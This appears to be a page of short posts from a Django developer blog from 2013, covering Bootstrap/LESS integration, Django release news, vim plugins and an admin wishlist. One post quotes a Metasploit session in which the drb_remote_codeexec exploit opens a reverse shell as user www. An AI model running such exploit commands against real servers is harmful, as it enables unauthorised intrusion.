Django-autocomplete-light has planned backward compatibility breaks for version 1.2. This version will be released around May 2013.

If using this app, you can check the BC breaks in question on github.

You’ve been warned !

Read more on alias.sh.

Ruby on rails websites are highly vulnerable.

Exploiting a rails site looks like this:

$ msfconsole
msf> use exploit/linux/misc/drb_remote_codeexec
msf  exploit(drb_remote_codeexec) > set URI druby://localhost:45074
msf  exploit(drb_remote_codeexec) > exploit
[*] Started reverse double handler
[*] trying to exploit instance_eval
< snip >
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:53299) at 2013-01-09 13:06:39 -0600
id
uid=1001(www) gid=1001(www) groups=1001(www)

This article demonstrates how to have your own project-specific twitter-bootstrap fork, allowing you to change stuff in variables.less and other files. In development, lesscss is computed by the browser, with the less library in debug mode. In production, it relies on django-compressor.

In site_base.html:

    {% if debug %}
        <link href="{{ STATIC_URL }}bootstrap/less/bootstrap.less" charset="utf-8" type="text/less" rel="stylesheet">
        <link href="{{ STATIC_URL }}bootstrap/less/responsive.less" rel="stylesheet">
        <script type="text/javascript">less = {}; less.env = 'development';</script>
        <script type="text/javascript" src="{{ STATIC_URL }}less.js" ></script>
    {% else %}
            {% compress css %}
            <link href="{{ STATIC_URL }}bootstrap/less/bootstrap.less" charset="utf-8" type="text/less" rel="stylesheet">
            <link href="{{ STATIC_URL }}bootstrap/less/responsive.less" rel="stylesheet">
            <link rel="stylesheet" type="text/css" href="{% static 'autocomplete_light/style.css' %}" />
            {% endcompress %}
    {% endif %}

In settings.py:

Django core hackers announced 1.5 release candidate.

This means that the 1.5 release notes are rather stable by now, the chances that they change is insignificant.

Wait for the final 1.5.0 release before migrating projects in production thought… Read more about what release candidate are.

Thanks to the Django core team and community for this awesome release !

It’s been a few days since I’m using jedi auto complete for vim, but for now all I can say is that it’s highly recommendable.

It’s not perfect of course, particularly when it comes to autocompleting self., but still, it’s a great addition to python-mode.

W3C announced that it has:

published the complete definition of the HTML5 and Canvas 2D specifications. Though not yet W3C standards, these specifications are now feature complete, meaning businesses and developers have a stable target for implementation and planning. “As of today, businesses know what they can rely on for HTML5 in the coming years, and what their customers will demand,” said Jeff Jaffe, W3C CEO.

It seems that django admin revamp discussions started again.

Last year, I sent a letter to santa asking for 12 transformers with super laser powers. I waited nicely and then received a little playmobil.

So, here’s my letter to santa this year:

• admin css must be in lesscss too, ie. you could override variables.less,
• widgets that are usable outside the admin should not be in django.contrib.admin, ie. the bootstrap-calendar widget should be usable outside the admin too,
• ChangeList should be decoupled, and even refactored into 2 separate modules: one for table display like django-tables2 and one for queryset filtering,
• for models with lots of fields, tabs are a must in the form,
• views and urls should be “normal”, have a fixed name and arguments instead of name generation,
• detail view and “read” permission support,
• per object and per field CRUD permissions,

Update to Django 1.3.5, 1.4.3 and 1.5 beta 2 security releases. Details

By C.A.R. Hoare, The 1980 ACM Turing Award Lecture